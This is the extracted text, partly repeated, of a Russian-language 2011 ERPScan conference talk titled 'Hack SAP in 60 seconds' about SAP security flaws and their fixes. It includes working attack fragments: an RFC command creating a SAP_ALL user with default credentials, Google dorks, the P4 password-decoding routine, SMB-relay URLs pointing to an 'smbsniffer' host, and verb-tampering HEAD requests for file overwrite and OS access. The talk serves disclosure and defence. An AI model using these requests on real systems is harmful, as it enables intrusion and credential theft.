sap risspa
TRANSCRIPT
Invest in securityto secure investments
Взломать SAP за 60 cекунд
Александр ПоляковТехнический Директор Digital Security
at RiSSPA
я
erpscancom 2ERPScan mdash invest in security to secure investments
Доклады о безопасности SAP
bull Всего более 40
erpscancom 3ERPScan mdash invest in security to secure investments
Количество SAP notes за год
bull Всего более 1500 на сентябрь 2011г
erpscancom 4ERPScan mdash invest in security to secure investments
Публичная информация об уязвимостях
bull Всего более 150
erpscancom 5ERPScan mdash invest in security to secure investments
SAP не дремлет
Из доклада Кристиана Виппермана (SAP) на последнем SAP TechED в Лас Вегасе
erpscancom 6ERPScan mdash invest in security to secure investments
Поговорим о безопасности
bull Что мы знаем о SAPbull Проблемы ответственности и контроляbull Примеры обхода SODbull Уязвимости ABAP движка из интернетbull Уязвимости J2EE движка из интернетbull Взломать SAP за 60 секунд демо
erpscancom 7ERPScan mdash invest in security to secure investments
Что мы знаем о SAP
Вставьте рисунок на слайд скруглите верхний левый и нижний правый угол (Формат ndash Формат рисунка) добавьте контур (оранжевый толщина ndash 3)
erpscancom 8ERPScan mdash invest in security to secure investments
Shut up
And
Pay
SAP Who cares
erpscancom 9ERPScan mdash invest in security to secure investments
Постоянные новые угрозы
bull Тема атак на SAP стала ldquoмоднойrdquo в security community
bull Публикуется множество уязвимостей
bull Ежегодно появляются угрозы
erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что делать
bull Администраторы не достаточно осведомлены
bull Понимание безопасности только на уровне матрицы SOD
bull Системы усложняются
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
я
erpscancom 2ERPScan mdash invest in security to secure investments
Доклады о безопасности SAP
bull Всего более 40
erpscancom 3ERPScan mdash invest in security to secure investments
Количество SAP notes за год
bull Всего более 1500 на сентябрь 2011г
erpscancom 4ERPScan mdash invest in security to secure investments
Публичная информация об уязвимостях
bull Всего более 150
erpscancom 5ERPScan mdash invest in security to secure investments
SAP не дремлет
Из доклада Кристиана Виппермана (SAP) на последнем SAP TechED в Лас Вегасе
erpscancom 6ERPScan mdash invest in security to secure investments
Поговорим о безопасности
bull Что мы знаем о SAPbull Проблемы ответственности и контроляbull Примеры обхода SODbull Уязвимости ABAP движка из интернетbull Уязвимости J2EE движка из интернетbull Взломать SAP за 60 секунд демо
erpscancom 7ERPScan mdash invest in security to secure investments
Что мы знаем о SAP
Вставьте рисунок на слайд скруглите верхний левый и нижний правый угол (Формат ndash Формат рисунка) добавьте контур (оранжевый толщина ndash 3)
erpscancom 8ERPScan mdash invest in security to secure investments
Shut up
And
Pay
SAP Who cares
erpscancom 9ERPScan mdash invest in security to secure investments
Постоянные новые угрозы
bull Тема атак на SAP стала ldquoмоднойrdquo в security community
bull Публикуется множество уязвимостей
bull Ежегодно появляются угрозы
erpscanru 10ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что делать
bull Администраторы не достаточно осведомлены
bull Понимание безопасности только на уровне матрицы SOD
bull Системы усложняются
Как атакуют
2007 ndash Архитектурные уязвимости RFC
2008 ndash Атаки на рабочие станции SAP
2009 ndash Бэкдоры для SAP атаки на SAPRouter
2010 ndash Атаки на WEB-приложения SAP
2010 ndash Stuxnet под SAP
2011 ndash Архитектурные и программные уязвимости в ERP
erpscanru 11ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Последний год
2011 ndash Атаки на JAVA движок SAP
2011 ndash SQL инъекции в ABAP
2011 ndash Переполнение буффера в ABAP
2011 ndash Атаки Session Fixation в SAP
2011 ndash Атаки на SAPGUI
2011 ndash Спуфинг и перехват DIAG протокола
erpscanru 12ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Что дальше
Угрозы для бизнеса
Шпионажbull Кража финансовой информацииbull Кража персональных секретовbull Списки поставщиков и контрагентов
Саботажbull Отказ в обслуживанииbull Модификация финансовой отчетностиbull Нарушение работоспособности доверенных систем (SCADA)
Мошенничествоbull Подмена данных о платежахbull Ложные транзакции
erpscanru 13ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как защищаемся
erpscancom 14ERPScan mdash Leading SAP AG partner in discovering and solving security vulnerabilities
Бизнес-логикаНеобходимо защитить доступ между пользователямиРешение Программы класса GRCУровень осведомлённости о проблеме - Высокий
Безопасность платформыНеобходимо защитить систему от неавторизированного доступа из внеРешение СканированиеМониторингТестирование на проникновениеУровень осведомлённости о проблеме - Низкий
Безопасность кодаЗащита от умышленных и неумышленных ошибок разработчиковРешение программный или ручной аудит кода Уровень осведомлённости о проблеме - Низкий
Что происходит сейчас
Ок вы потратили XXX млн $ на лицензию SAP GRC + XXXX млн $ на консультантов оптимизацию SOD и привели красивый отчёт для руководства что за 1 год количество конфликтов уменьшилось с 2389123 до ~10000 И в следующем году планируется уменьшить до 1000
А как обстоят дела с настройками безопасности платформы
erpscanru 15ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как проконтролировать безопасность столь сложной системы
erpscanru 16ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
1001 Способ обойти SOD
bull Не диалоговые пользователиbull Прямой доступ к таблицамbull Безопасность сервисов типа Gateway и Massage Server и прочих bull Хитрые настройки bull Доступ из интернет bull Уязвимости
erpscanru 17ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Не диалоговые пользователи
Есть множество RFC функций для создания пользователя
Пример1 SUSR_RFC_USER_INTERFACEstartrfc -3 -h 17216063 -s 01 -c 001 -u SAPCPIC -p admin ndashF SUSR_RFC_USER_INTERFACE -E USER=TEST -E ACTIVITY=01 -E PASSWORD=123 -E USER_TYPE=A -T USER_PROFILES12r=SAP_ALL
Пример2 BAPI_USER_CREATE1erpscanru 18ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Миф Пользователи SAPCPIC и TMSADM не диалоговые и не имеют доступ к бизнес-информации
Атаки на Gateway и Message Server
bull Атаки описаны в руководстве по безопасности SAP
bull Позволяют ndash неавторизированно зарегистрировать ложный сервер приложений
ndash вызвать зарегистрированный RFC сервис типа SAPXPG
ndash зарегистрировать свой RFC сервис
bull Есть настройки позволяющие
элементарно закрыть уязвимости
erpscanru 19ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Если это так просто и очевидно почему в 90 аудитов настроено не безопасно
Хитрые настройки
Администратор выставил следующие настройки
loginmin_password_uppercase = 2
loginmin_password_lng = 8
loginmin_password_specials = 2
loginpassword_compliance_to_current_policy = 0
loginpassword_max_idle_productive =90
loginpassword_max_idle_initial = 90
В чём проблема
erpscanru 20ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Прямой доступ к таблицам
bull Чтение таблиц
ndash через транзакции SE16 SM31 SM30 SA38 SE38
ndash через RFC вызовы RFC_READ_TABLE
bull Критичные таблицы
USR02 mdash хеши паролей
SSF_PSE_D mdash ключи для SSO доступа
RFCDES ndash пароли в открытом и зашифрованном виде
ICFSERVLOC - пароли для ICF сервисов в открытом виде
и ещё немного пока под секретом
erpscanru 21ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Доступ из интернет + уязвимости
erpscancom 22ERPScan mdash invest in security to secure investments
Атаки на ICM (ABAP)
Более 1500 сервисов с критичным функционалом
1) По умолчанию разрешён доступ любым пользователем
2) Для доступа к sapbcsoaprfc не проверяется авторизация S_RFC
3) Используя пароли по умолчанию типа TMSADMPASSWORD
erpscanru 23ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Как итог - полный контроль системы злоумышленником
Прочие небезопасные сервисы
bull sappublicinfo mdash информация о системе анонимноbull sappublicicf_infoicr_groups mdash информация о приложенияхbull sapbcsoaprfc mdash выполнение RFC команд удаленно DOSbull sapbcsrtxipsap mdash выполнение критичных действийbull sapbwBex mdash просмотр критичных
инфообъектовbull sapbcbspsaphtmlb_samples mdash тестовый сервисbull sapbcguisapitswebgui mdash SAPGUI через WEB
erpscanru 24ERPScan mdash инвестируйте в безопасность для защиты ваших инвестиций
Нами изучено более 50 небезопасных сервисов
Атаки на J2EE Engine
NetWeaver J2EE = интеграция управление взаимодействие
bull SAP Portal bull SAP PIbull SAP XIbull SAP Mobile Infrastructurebull SAP Solution Manager
erpscancom 25ERPScan mdash invest in security to secure investments
J2EE Platform Architecture
erpscancom 26ERPScan mdash invest in security to secure investments
Удалённый доступ
erpscancom 27ERPScan mdash invest in security to secure investments
Service Name Port Number Default Value Range (min-max)HTTP 5NN00 50000 50000-59900
HTTP over SSL 5NN01 50001 50001-59901
IIOP 5NN07 50007 50007-59907
IIOP Initial Context 5NN02 50002 50002-59902
IIOP over SSL 5NN03 50003 50003-59903
P4 5NN04 50004 50004-59904
P4 over HTTP 5NN05 50005 50005-59905
P4 over SSL 5NN06 50006 50006-59906
Telnet 5NN08 50008 50008-59908
LogViewer control 5NN09 50009 50009-59909
JMS 5NN10 50010 50010-59910
По умолчанию шифрование на всех портах отключено
Уязвимый алгоритм шифрования паролей в P4
erpscancom 28ERPScan mdash invest in security to secure investments
bull P4 - протокол используемый утилитой Visual Adminbull Все данные передаются в открытом видеbull К сожалению (счастью) пароль закодирован
Как он закодирован
Уязвимый алгоритм шифрования паролей в P4
erpscancom 29ERPScan mdash invest in security to secure investments
Уязвимый алгоритм шифрования паролей в P4
erpscancom 30ERPScan mdash invest in security to secure investments
Удиви меня
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
